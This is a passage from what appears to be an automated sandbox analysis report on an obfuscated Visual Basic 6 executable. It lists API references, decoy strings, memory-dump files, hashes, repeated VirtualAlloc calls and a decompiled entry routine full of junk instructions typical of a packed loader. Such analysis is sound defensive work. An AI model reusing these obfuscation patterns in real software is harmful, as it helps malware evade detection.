__vbaFreeStr.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040E126
__vbaF.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040E12E
__vbaFreeVar.MSVBVM60(00000000,00401148,0040B118,000006FC), ref: 0040E136
__vbaFreeVar.MSVBVM60(0040E1E1), ref: 0040E1DB

Strings

demideity, xrefs: 0040CB05
Oksehoveders, xrefs: 0040C9CA
=hC, xrefs: 0040C2F2, 0040C2F8
Rearouses, xrefs: 0040D414, 0040DA46
SIGNIFIKANSNIVEAUERS, xrefs: 0040C58B
Dlgsmaals, xrefs: 0040D707, 0040DD39
`os, xrefs: 0040C210, 0040C219, 0040C228, 0040C234, 0040C359, 0040C362, 0040C371, 0040C37D, 0040C400, 0040C409, 0040C418, 0040C424, 0040C4A7, 0040C4B0, 0040C4BF, 0040C4CB, 0040C63F, 0040C648, 0040C657, 0040C663, 0040C6EC, 0040C6F5, 0040C704, 0040C710, 0040C796, 0040C79F, 0040C7AE, 0040C7BA, 0040C843, 0040C84C, 0040C85B, 0040C867, 0040C8F0, 0040C8F9, 0040C908, 0040C914, 0040CB18, 0040CB21, 0040CB30, 0040CB3C, 0040CBC5, 0040CBCE, 0040CBDD, 0040CBE9, 0040CD37, 0040CD40, 0040CD4F, 0040CD5B, 0040CDF4, 0040CDFD, 0040CE0C, 0040CE18, 0040CE9E, 0040CEA7, 0040CEB6, 0040CEC2, 0040CF4B, 0040CF54, 0040CF63, 0040CF6F, 0040CFF5, 0040CFFE, 0040D00D, 0040D019, 0040D1B5, 0040D1BE, 0040D1CD, 0040D1D9, 0040D25C, 0040D265, 0040D274, 0040D280, 0040D306, 0040D30F, 0040D31E, 0040D32A, 0040D475, 0040D47E, 0040D48D, 0040D499, 0040D519, 0040D522, 0040D531, 0040D53D, 0040D5C3, 0040D5CC, 0040D5DB, 0040D5E7, 0040D7E7, 0040D7F0, 0040D7FF, 0040D80B, 0040D88E, 0040D897, 0040D8A6, 0040D8B2, 0040D938, 0040D941, 0040D950, 0040D95C, 0040DAA7, 0040DAB0, 0040DABF, 0040DACB, 0040DB4B, 0040DB54, 0040DB63, 0040DB6F, 0040DBF5, 0040DBFE, 0040DC0D, 0040DC19, 0040DDD3, 0040DDDC, 0040DDEB, 0040DDF7, 0040DE80, 0040DE89, 0040DE98, 0040DEA4, 0040DFF2, 0040DFFB, 0040E00A, 0040E016, 0040E245, 0040E24E, 0040E25D, 0040E266
TCHADERE, xrefs: 0040C2BA, 0040E09C
snydertampenes, xrefs: 0040CAEC
unrecumbently, xrefs: 0040C5E0
HALFPACE, xrefs: 0040CCA8, 0040DF63

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$List$Chkstk$Copy$CallLate$BstrMove
String ID: =hC$Dlgsmaals$HALFPACE$Oksehoveders$Rearouses$SIGNIFIKANSNIVEAUERS$TCHADERE$`os$demideity$snydertampenes$unrecumbently
API String ID: 592220026-3354766968
Opcode ID: 98fa3f487931c68db93282c684a2fd0f879c9e6e008625127d949ea824b68551
Instruction ID: bc076e4ea15870067657db27f5410b5a2404f03eb9d59c84892e2d39bf742d2b
Opcode Fuzzy Hash: 98fa3f487931c68db93282c684a2fd0f879c9e6e008625127d949ea824b68551
Instruction Fuzzy Hash: 8123D671900218DFDB21DF90CC89BD9B7B8BB08304F1085EAE549BB2A1D7B95AC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401394, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 67%

			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				signed char _t16;
				char _t18;
				signed int _t20;

				_push("VB5!6&*"); // executed
				L0040138E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t16 = __eax + 1;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				asm("xlatb");
				asm("daa");
				asm("in al, dx");
				asm("jecxz 0x48");
				asm("sbb eax, 0x9927b44d");
				asm("fdivr dword [gs:ebx+0x65]");
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *__ecx =  *__ecx + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *((intOrPtr*)(_t16 + _t16)) =  *((intOrPtr*)(_t16 + _t16)) + _t16;
				 *_t16 =  *_t16 + _t16;
				asm("insb");
				 *_t16 =  *_t16 + _t16;
				asm("int3");
				 *_t16 =  *_t16 ^ _t16;
				asm("out 0x40, eax");
				asm("adc eax, 0x85736377");
				_pop(_t18);
				asm("movsd");
				 *0x708dfd57 = _t18;
				 *( *((_t16 |  *(_t16 + 0x7a66635b)) + 0x2cbe1ef8)) =  *( *((_t16 |  *(_t16 + 0x7a66635b)) + 0x2cbe1ef8)) >> 1;
				asm("lodsd");
				asm("stosb");
				 *((intOrPtr*)(_t18 - 0x2d)) =  *((intOrPtr*)(_t18 - 0x2d)) + _t18;
				_t20 = 0x00000085 ^  *(__ecx + 1 - 0x48ee309a);
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				 *_t20 =  *_t20 + _t20;
				return _t20;
			}

0x00401394
0x00401399
0x0040139e
0x004013a0
0x004013a2
0x004013a4
0x004013a6
0x004013a8
0x004013a9
0x004013ab
0x004013ad
0x004013b0
0x004013b1
0x004013b3
0x004013b4
0x004013b6
0x004013bb
0x004013c1
0x004013c3
0x004013c5
0x004013c7
0x004013c9
0x004013cb
0x004013ce
0x004013d1
0x004013e1
0x004013e5
0x004013e6
0x004013ef
0x004013f9
0x004013fe
0x004013ff
0x00401403
0x00401408
0x0040140b
0x00401414
0x00401415
0x00401418
0x00401419
0x0040141b
0x0040141d
0x0040141f
0x00401421
0x00401423
0x00401425
0x00401427
0x00401429
0x0040142b
0x0040142d
0x0040142f
0x00401431
0x00401433
0x00401435
0x00401437
0x00401439
0x0040143b
0x0040143d

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401399

Strings

VB5!6&*, xrefs: 00401394

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 330ae7c98d1e5ac2f907677fce3174c0601bb0912e2fd456ca12d39f7d194eae
Instruction ID: 6f574bfb7a3c8b743dcbb85c62aacbed460a02f5bea4956a0cf43cee890fa23b
Opcode Fuzzy Hash: 330ae7c98d1e5ac2f907677fce3174c0601bb0912e2fd456ca12d39f7d194eae
Instruction Fuzzy Hash: 1C11122148E3C18FD7078B7889266953FB09E57254B1E00EBC8C1DF4B3C229984EC767

Uniqueness

Uniqueness Score: -1.00%

Function 00402977, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 491COMMON

Download Yara Rule

Strings

F, xrefs: 00402A15

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 84e946d9815191323a5d27d37cb8d16621112b27f612187b599f56a07c5dfc0e
Instruction ID: 8271d952c245063fb9fd1a63bdf4e488fa428d132639f8fc4cb25b8c01109621
Opcode Fuzzy Hash: 84e946d9815191323a5d27d37cb8d16621112b27f612187b599f56a07c5dfc0e
Instruction Fuzzy Hash: E0911661A7D68488E1322920828C276B94CFB977B7334D77B85A7711D1AEBD0E4B344D

Uniqueness

Uniqueness Score: -1.00%

Function 00402924, Relevance: 1.8, APIs: 1, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de83a6f7241edfe69635b5fcc69f8cb9d90b086a15d29ef5c818f6ea660cb52
Instruction ID: 3aac9d51044dc99a9575974b8923ec1edb1a17e86c09fcd1193474194085d3b0
Opcode Fuzzy Hash: 5de83a6f7241edfe69635b5fcc69f8cb9d90b086a15d29ef5c818f6ea660cb52
Instruction Fuzzy Hash: 30A1EFA1B3D64484D13A2911834C276790CEB977ABB34A7BF80ABF11E169FD0E4B344D

Uniqueness

Uniqueness Score: -1.00%

Function 004026D1, Relevance: 1.7, APIs: 1, Instructions: 477memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ffbdb61bb5f070f1f82324acc2ad036154b5349fe1c28d1345938a7bc033b48
Instruction ID: 348caad4dbf0393cab41e4bbf669e5861ec413d3ab41b3f8e2cd5bef3b1a8a8d
Opcode Fuzzy Hash: 6ffbdb61bb5f070f1f82324acc2ad036154b5349fe1c28d1345938a7bc033b48
Instruction Fuzzy Hash: E781DD61D7EB04C9D506692081882716D4CFF97357330EB7B85ABB25D1AA7E0F8B318E

Uniqueness

Uniqueness Score: -1.00%

Function 00402687, Relevance: 1.7, APIs: 1, Instructions: 468memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c77a23db568cfe3e689964f21ce72b87c18e7a434e4d8ef3afa85fcf835429d7
Instruction ID: 791ad11e452170b8486efa1a71182834b18c7ce9cea364d62f3bfe4cf383be1f
Opcode Fuzzy Hash: c77a23db568cfe3e689964f21ce72b87c18e7a434e4d8ef3afa85fcf835429d7
Instruction Fuzzy Hash: CE91DD51D7EB04C9D506692081882716D4CFF97357330EB7B85ABB25D1AA7E0F8B318E

Uniqueness

Uniqueness Score: -1.00%

Function 004027CF, Relevance: 1.7, APIs: 1, Instructions: 462memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d11a219563febb10c3e90cc34cbe58d626dd5bdb6f2a5f7a65ba0f7501f6d416
Instruction ID: b1287accea22ec88ea9a174f91e651d31a43df083489b1a34a9d3bbfcb814163
Opcode Fuzzy Hash: d11a219563febb10c3e90cc34cbe58d626dd5bdb6f2a5f7a65ba0f7501f6d416
Instruction Fuzzy Hash: 7981CD61D7EB04C9D502692081852716D4CFF97357330EB7B85ABB24D1AA7E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 0040262A, Relevance: 1.7, APIs: 1, Instructions: 455memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ad584f232c1a44c5d5ea95055643d0e8d148a0b42f06300811f910472a2d6e4b
Instruction ID: 370c61e1b6ac5662d900fe27fe6e4b0eb8c646eb51f7649f9654c8d81f370653
Opcode Fuzzy Hash: ad584f232c1a44c5d5ea95055643d0e8d148a0b42f06300811f910472a2d6e4b
Instruction Fuzzy Hash: E891DD51D7DB04C9D506692081882B16D4CFF97357330EB7B85ABB24D1AA7E0F8B308E

Uniqueness

Uniqueness Score: -1.00%

Function 0040282A, Relevance: 1.7, APIs: 1, Instructions: 453memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 07091f8c9b3341475f021cfbd2d57d68e70f22f3c08722499622845fafb8bdb0
Instruction ID: 67db0e8bdfe2004cbf9593ab48d07fbbe335a6747513fdb4e9e4b3da5f4f59e1
Opcode Fuzzy Hash: 07091f8c9b3341475f021cfbd2d57d68e70f22f3c08722499622845fafb8bdb0
Instruction Fuzzy Hash: F081DC61D7DB04C9D502692081842B16D4CEF97357330EB7B85ABB24D1AA7E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402728, Relevance: 1.7, APIs: 1, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06157f308685bde349bf1ccf0a42ead736041a1119af6716997776313981106b
Instruction ID: db3d70df0a1edd785c7290e174365dbcb5fc7f5cf02972da0ff2eb6ffecbf630
Opcode Fuzzy Hash: 06157f308685bde349bf1ccf0a42ead736041a1119af6716997776313981106b
Instruction Fuzzy Hash: 8F91CD61D7DA04C9D506692081842716D4CFF97357330EB7B85ABB20D1AA7E0F8B318E

Uniqueness

Uniqueness Score: -1.00%

Function 00402783, Relevance: 1.7, APIs: 1, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4882b8d57f6adbcd3043726a5fb4dd740f83387e56435662c0677a09cd3ab5e5
Instruction ID: 6297c02829c53a82f09e1a2f165a17a86b79e0e8b370f2da13c713e12a80c1ff
Opcode Fuzzy Hash: 4882b8d57f6adbcd3043726a5fb4dd740f83387e56435662c0677a09cd3ab5e5
Instruction Fuzzy Hash: 0381DE61D7EB04C9D602692081892B16D4CFF97357330DB7B85AB720D1AA7E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 0040287C, Relevance: 1.7, APIs: 1, Instructions: 413memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b63f1a1701d75e288b2a3a129437013038edf6e49970d93c0d323fd8af8607d5
Instruction ID: 81a1ccb8922a24bb87a9bbffb103c5bc5e60e2113452c727d3516ace09c2e899
Opcode Fuzzy Hash: b63f1a1701d75e288b2a3a129437013038edf6e49970d93c0d323fd8af8607d5
Instruction Fuzzy Hash: 4B81CC61D7DB04C9D5026D2081882B16D4CEF97357330EB7B85AB724E1AA7E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 004028D9, Relevance: 1.7, APIs: 1, Instructions: 402memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fac6fe7fef6c60c51281ea18d0ac681d827b0a60bb8893c8d8228947f498bc77
Instruction ID: 5d036b0f83893957f3fa107887871afd56126dc81733a326060b90a09f91ad75
Opcode Fuzzy Hash: fac6fe7fef6c60c51281ea18d0ac681d827b0a60bb8893c8d8228947f498bc77
Instruction Fuzzy Hash: B481DC61D7EA04C9D5026D2081842B16D4CFF97357330EB7B85AB721D1AA7E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402E47, Relevance: 1.6, APIs: 1, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f16ce8a654a55d40df5a3f01f23073f9ec3af732e0e0866976c69653771b3c
Instruction ID: 20263b6ec85eb7f76271b71e1a52414e6ac98b41d070f5fd8b2449163329b5d7
Opcode Fuzzy Hash: f2f16ce8a654a55d40df5a3f01f23073f9ec3af732e0e0866976c69653771b3c
Instruction Fuzzy Hash: 9161C17993DE0689CA125D1181881716D9CEBA73AB320D7BFC4A7710E1A6BD0F4B354D

Uniqueness

Uniqueness Score: -1.00%

Function 00402CF9, Relevance: 1.6, APIs: 1, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f713817e200e278a48cf3282a4834246c331c29e0d957536a0b7a59aea81e68
Instruction ID: c78b6b8739aa903364504a618479d29e3d2ed4e64d7f11b08bafa42ef8ea5369
Opcode Fuzzy Hash: 9f713817e200e278a48cf3282a4834246c331c29e0d957536a0b7a59aea81e68
Instruction Fuzzy Hash: 5291681C83D64484D5465F10868CA762D08FFA7B467A09FFF869B7B0E292BD0E47704D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E91, Relevance: 1.6, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8843ce723f921094068022d45e2466cb845649d9590cca979efd6ab2306699a9
Instruction ID: 63eba71df41c27df453063bee45d729db139f0bef5c75b186b9aec7abdfd9d66
Opcode Fuzzy Hash: 8843ce723f921094068022d45e2466cb845649d9590cca979efd6ab2306699a9
Instruction Fuzzy Hash: BA618E7993DE0684C9125D2181881716DACEBA73AF320D7BFC46B724D1A6BD4F4B314D

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFB, Relevance: 1.6, APIs: 1, Instructions: 376memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e1900e78c4ea192f782bf73f09398c28fc2f09e0ef33e689472d1edb75097b30
Instruction ID: 347cd98031c08e0c52b8c7ffa32083a42f96cf62b0a97468ec48258a30088c71
Opcode Fuzzy Hash: e1900e78c4ea192f782bf73f09398c28fc2f09e0ef33e689472d1edb75097b30
Instruction Fuzzy Hash: A961AA65D7DA4489D2026D2084842B12D4CEBD7357330EB7B85ABB60E1AA3D0F8B318E

Uniqueness

Uniqueness Score: -1.00%

Function 00402A6C, Relevance: 1.6, APIs: 1, Instructions: 370memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0969f8b429b3a065b2b0b138e7028435be6db97575dd9331b07a24634e7997bd
Instruction ID: d54a982e7ed5d0c3cc314db1e694555034e9652e41e0727ef7c5e93ab3b66ee6
Opcode Fuzzy Hash: 0969f8b429b3a065b2b0b138e7028435be6db97575dd9331b07a24634e7997bd
Instruction Fuzzy Hash: C071CB65D7DB0489D2026D2081842B16D4CEB97357330EB7B85AB764D1AA3E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C4E, Relevance: 1.6, APIs: 1, Instructions: 365memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 32e2eb8858b489d92ba0be2e628c60ef5ee0845f91d2d9fcbf1b123171552832
Instruction ID: ba7ab04047ef3b9650d41d5bd62bb5e0401d52250b95bbb3efea355aadb00936
Opcode Fuzzy Hash: 32e2eb8858b489d92ba0be2e628c60ef5ee0845f91d2d9fcbf1b123171552832
Instruction Fuzzy Hash: 1A61BB65D7DA4489D2065D20C4842B16D4CEFD7357330EB7B85AB760E1AA3E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402B57, Relevance: 1.6, APIs: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93e3987f81a25d02b07e460715fe0dc66ac8a6f7c871631cec78edb41c18377e
Instruction ID: 794249e21e8bc358353aae4d67ad3d198273578cc7bd62ef210ee733cc45187d
Opcode Fuzzy Hash: 93e3987f81a25d02b07e460715fe0dc66ac8a6f7c871631cec78edb41c18377e
Instruction Fuzzy Hash: B661BC65D7DB0489D2026D20C5846B16D4CEBD7357330EB7B85AB760D1A63D0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402B05, Relevance: 1.6, APIs: 1, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2418053d59ff4dc341a2bfbcd6e7adfcadaf8030ee61bd7c7ee949eb8416c711
Instruction ID: 2362c8da55bfc825078e46afa2a83ab88eb0b7460449af2ee4f2b6b226d78941
Opcode Fuzzy Hash: 2418053d59ff4dc341a2bfbcd6e7adfcadaf8030ee61bd7c7ee949eb8416c711
Instruction Fuzzy Hash: 8571CC65D7DA4489D6026D20C1842B16E4CEFD7397330EB7B85AB760D1AA3D0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402AE9, Relevance: 1.6, APIs: 1, Instructions: 333memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 07344566b0f861bf11d50e60d7b5912fee7b7c0f744b6f1c8146057b175039d4
Instruction ID: 4cffdbdb488ae0599bedbfa86765e40f9bcb7629597cd2454b064af2b5446074
Opcode Fuzzy Hash: 07344566b0f861bf11d50e60d7b5912fee7b7c0f744b6f1c8146057b175039d4
Instruction Fuzzy Hash: 6271BB65D7DA0489D2066D2081842B16D4CEB97357330EB7B85AB760E1AA3E0F8B358E

Uniqueness

Uniqueness Score: -1.00%

Function 00402EDC, Relevance: 1.6, APIs: 1, Instructions: 330memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66ce5a112c656f4b746fef003207868ca2d17ca3cd5859bfac1f2344c0911ee7
